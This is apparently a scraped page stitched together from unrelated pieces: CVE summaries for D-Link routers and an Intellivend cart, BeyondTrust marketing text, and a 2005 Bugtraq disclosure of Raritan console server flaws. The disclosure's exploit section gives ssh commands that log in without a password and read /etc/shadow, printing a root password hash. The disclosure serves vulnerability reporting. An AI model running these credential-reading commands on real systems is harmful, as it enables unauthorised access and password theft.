Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in D-Link DI-524, DI-604 Broadband Router, DI-624, D-Link DI-784, WBR-1310 Wireless G Router, WBR-2310 RangeBooster G Router, and EBR-2310 Ethernet Broadband Router allows remote attackers to execute arbitrary code via a long M-SEARCH request to UDP port 1900.

**Privileged Access Management with a Fast Time-to-Value**

In a world of stolen identities, phished passwords, and deep fakes, you can't just trust users and systems. You need to know identities and access pathways are secure. BeyondTrust provides intelligent identity and access security. Ensure all access is always managed, monitored, and abides by least privilege and just-in-time principles.

**Password Safe**

Securely manage privileged accounts and credentials to protect sensitive assets and meet compliance.

Learn more

**Privilege Management for Unix & Linux**

Achieve compliance, control privileged access, and prevent and contain breaches on Unix and Linux systems.

Learn more

**Privileged Remote Access**

Centrally manage remote access for service desks, vendors, and operators.

Learn more

**Privilege Management for Windows & Mac**

Pair powerful least privilege management and application control capabilities to gain unmatched, preventative endpoint security.

Learn more

**Remote Support**

Empower your help desk teams to quickly and securely access and fix any remote device, on any platform, with a single solution.

Learn more

**Active Directory Bridge**

Centralize authentication for Unix and Linux environments by extending AD’s Kerberos authentication and SSO.

Learn more

**Cloud Privilege Broker**

Automate the management of identities and assets across your multicloud footprint.

Learn more

**Identity Security Insights**

Leverage threat intelligence recommendations with a centralized view of identities, accounts, and privileged access

Learn more

Gartner, Magic Quadrant for Privileged Access Management, By Michael Kelley, etc., 19 July 2022.  
Gartner, Gartner Peer Insights ‘Voice of the Customer’: Privileged Access Management, Peer Contributors, 21 December 2021.  

_Gartner® Peer Insights™ content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose._  
_The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved._ **Gartner Disclaimer:** _Gartner does not endorse any vendor, product or service depicted in our research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose._

CVE-2006-3687: Privileged Access Management and Remote Access Software | BeyondTrust

Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 set (1) world-readable permissions for /etc/shadow and (2) world-writable permissions for /bin/busybox, which allows local users to obtain hashed passwords or execute arbitrary code as other users.

**Bugtraq mailing list archives**

_From_: spam () drwetter org  
_Date_: 28 Jun 2005 17:56:55 -0000  

Hi,

during my research on console servers I've encountered a severe problem on one appliance.

Summary:
Access right escalation / severe permission problems on Raritan Console Servers

Confirmed on DSX32, Software version: 2.4.6
www.raritan.com, more see below

Details:
DSX Raritan Console Servers come with two accounts not having a password. They are "protected" by "exit" in ~/.profile. 
Users normally is not supposed to get access to the underlying Linux.
DES encrypted root passwd is easily retrievable from the network without providing credentials. Also the machine can be 
rendered useless by moving the busybox binary.

Vulnerable Versions:
Vendor Confirmation for DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel).


Patches/Workarounds:
After reporting it to Raritan a fix was released:
http://www.raritan.com/support/sup\_upgrades.aspx

Exploit:
%ssh dominion@<ip> ls -l /
\[..shows listing..\]
%ssh dominion@<ip> ls -ln /etc/shadow
-rw-r--r--    1 0     0           360 Jun 28 05:09 /etc/shadow
%ssh dominion@<ip> cat /etc/shadow
root:DX8k7w4C2gJ2g:10933:0:99999:7:::
bin:\*:10933:0:99999:7:::
daemon:\*:10933:0:99999:7:::
adm:\*:10933:0:99999:7:::
lp:\*:10933:0:99999:7:::
sync:\*:10933:0:99999:7:::
shutdown:\*:10933:0:99999:7:::
halt:\*:10933:0:99999:7:::
uucp:\*:10933:0:99999:7:::
operator:\*:10933:0:99999:7:::
nobody:\*:10933:0:99999:7:::
dominion::12962:0:99999:7:::
sshd::12962:0:99999:7:::
%ssh dominion@<ip> cat /etc/passwd | tail -2
dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh
sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh
%ssh sshd@<ip> ls
indexApp.htm
%ssh sshd@<ip> ls -l /bin/busybox
-rwxrwxrwx    1 root     root        193852 Apr  4  2004 /bin/busybox


-----
Dr. Dirk Wetter                                  http://drwetter.org
Consulting IT-Security + Open Source 
Key fingerprint = 80A2 742B 8195 969C 5FA6  6584 8B6E 59C1 E41B 9153

**Current thread:**

*   **Access right escalation / severe permission problems on Raritan Console Servers** _spam (Jun 28)_

CVE-2005-2136: Bugtraq: Access right escalation / severe permission problems on Raritan Console Servers

The Intellivend shopping cart application allows remote users to modify sensitive purchase information via hidden form fields.

Tag

#intel